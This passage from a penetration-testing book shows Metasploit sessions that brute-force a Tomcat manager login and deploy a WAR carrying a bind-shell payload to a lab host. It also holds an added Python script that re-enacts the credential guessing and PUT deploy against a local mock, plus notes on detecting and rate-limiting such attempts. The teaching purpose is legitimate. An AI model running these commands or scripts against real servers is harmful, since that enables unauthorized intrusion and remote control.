
Simulated Penetration Test

261

service.) After some more research on the version of the Apache Tomcat installation running on the target, the Tomcat manager application seemed the best route for compromising the system. If we can get through the manager's login, we can use the HTTP PUT method it exposes to deploy our payload on the vulnerable system. We launch the attack as follows (with the list of exploits and payloads snipped):

msf > search apache
[*] Searching loaded modules for pattern 'apache'...

. . . SNIP . . .

msf auxiliary(tomcat_mgr_login) > set RHOSTS 172.16.32.162
RHOSTS => 172.16.32.162
msf auxiliary(tomcat_mgr_login) > set THREADS 50
THREADS => 50
msf auxiliary(tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf auxiliary(tomcat_mgr_login) > set VERBOSE false
VERBOSE => false
msf auxiliary(tomcat_mgr_login) > run

[+] http://172.16.32.162:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tomcat_mgr_login) >

Our brute force attack is successful, and it logs in with the username tomcat and password tomcat. But we don't yet have a shell.

With our newly discovered credentials, we leverage the Tomcat manager's HTTP PUT deployment functionality with the multi/http/tomcat_mgr_deploy exploit to place our payload on the system, using the valid username and password that we discovered by brute-forcing the login.
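The two steps just described, a credential check against the Tomcat Manager login page followed by an HTTP PUT of a WAR through the manager's deploy endpoint, as an added example that is not from the book or from Metasploit's own modules. Both sides run locally: MockManager is a constructed stand-in for the manager webapp (it is not Tomcat; it only reproduces the Basic-auth challenge, the manager paths and the "OK - Deployed" reply), VALID_CREDS and CANDIDATES are constructed values, and the JSP packed into the WAR is inert text where tomcat_mgr_deploy's JSP would run the chosen payload. The paths follow the pre-Tomcat-7 manager layout (/manager/html for the login page, /manager/deploy for the PUT); Tomcat 7 and later move the scriptable deploy to /manager/text/deploy and require the manager-script role, so the same PUT would go there.

```python
import base64
import http.server
import io
import threading
import urllib.error, urllib.parse, urllib.request
import zipfile

# Constructed: tomcat/tomcat is the default pair the page's brute force recovers.
VALID_CREDS = {("tomcat", "tomcat")}
CANDIDATES = [("admin", "admin"), ("tomcat", "s3cret"), ("tomcat", "tomcat")]  # stands in for a wordlist
LOGIN_PATH = "/manager/html"
DEPLOY_PATH = "/manager/deploy"  # pre-Tomcat-7 path; Tomcat 7+ uses /manager/text/deploy

class MockManager(http.server.BaseHTTPRequestHandler):
    """Stand-in for the manager webapp (not Tomcat): Basic auth, GET login page, PUT deploy."""
    deployed = {}  # context path -> uploaded WAR bytes

    def _authorised(self):
        hdr = self.headers.get("Authorization", "")
        try:
            scheme, token = hdr.split(" ", 1)
            user, _, pw = base64.b64decode(token).decode().partition(":")
        except (ValueError, UnicodeDecodeError):  # missing, malformed or non-base64 header
            return False
        return scheme == "Basic" and (user, pw) in VALID_CREDS

    def _reply(self, status, body=b""):
        self.send_response(status)
        if status == 401:  # the challenge a real manager sends back
            self.send_header("WWW-Authenticate", 'Basic realm="Tomcat Manager Application"')
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        if not self._authorised():
            return self._reply(401)
        self._reply(200, b"<title>/manager</title>Tomcat Web Application Manager")

    def do_PUT(self):
        if not self._authorised():
            return self._reply(401)
        url = urllib.parse.urlsplit(self.path)
        ctx = urllib.parse.parse_qs(url.query).get("path", [""])[0]
        MockManager.deployed[ctx] = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        self._reply(200, f"OK - Deployed application at context path {ctx}\r\n".encode())

    def log_message(self, *args):  # keep the demo quiet
        pass

# No proxy handlers, so the loopback requests never leave the host.
_opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))

def _auth(user, pw):
    return {"Authorization": "Basic " + base64.b64encode(f"{user}:{pw}".encode()).decode()}

def try_login(base, user, pw):
    """One credential check: 200 from /manager/html means the pair is valid."""
    try:
        with _opener.open(urllib.request.Request(base + LOGIN_PATH, headers=_auth(user, pw))) as resp:
            return resp.getcode() == 200
    except urllib.error.HTTPError:  # 401/403: wrong password or missing manager role
        return False

def brute_force(base, candidates):
    """Walk the list the way tomcat_mgr_login does; return the first working pair or None."""
    for user, pw in candidates:
        if try_login(base, user, pw):
            return user, pw
    return None

def build_war(jsp_source):
    """Pack one JSP into a WAR (a zip). The module's JSP runs its payload; this one is inert."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("index.jsp", jsp_source)
    return buf.getvalue()

def deploy(base, user, pw, ctx, war):
    """PUT the WAR to the deploy endpoint with the recovered credentials; return the reply text."""
    url = f"{base}{DEPLOY_PATH}?{urllib.parse.urlencode({'path': ctx})}"
    with _opener.open(urllib.request.Request(url, data=war, method="PUT", headers=_auth(user, pw))) as resp:
        return resp.read().decode().strip()

def run_demo():
    """Start the mock on an ephemeral port, brute-force the login, then deploy a WAR."""
    srv = http.server.HTTPServer(("127.0.0.1", 0), MockManager)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    base = f"http://127.0.0.1:{srv.server_address[1]}"
    try:
        creds = brute_force(base, CANDIDATES)
        if creds is None:  # nothing in the list worked: stop before any deploy attempt
            return {"creds": None}
        reply = deploy(base, *creds, "/demo", build_war('<%= "hello" %>'))
        names = zipfile.ZipFile(io.BytesIO(MockManager.deployed["/demo"])).namelist()
        return {"creds": creds, "reply": reply, "war_contents": names}
    finally:
        srv.shutdown()
        srv.server_close()
```

Two things worth noticing from the exchange: the login check is cheap to brute-force because every wrong pair gets a clean 401 and the right one a 200, so on the defensive side each attempt shows up in the Tomcat access log as a 401 on /manager/html, and the deploy is the PUT to the deploy path that follows the first 200. Tomcat 7 and later also ship a LockOutRealm that can be wrapped around the user realm to slow this kind of guessing down.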

msf auxiliary(tomcat_mgr_login) > use multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set password tomcat
password => tomcat
msf exploit(tomcat_mgr_deploy) > set username tomcat
username => tomcat
msf exploit(tomcat_mgr_deploy) > set RHOST 172.16.32.162
RHOST => 172.16.32.162
msf exploit(tomcat_mgr_deploy) > set LPORT 9999
LPORT => 9999
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/shell_bind_tcp
payload => linux/x86/shell_bind_tcp
msf exploit(tomcat_mgr_deploy) > exploit

[*] Using manually select target "Linux X86"
[*] Uploading 1669 bytes as FW36owipzcnHeUyIUaX.war ...
[*] Started bind handler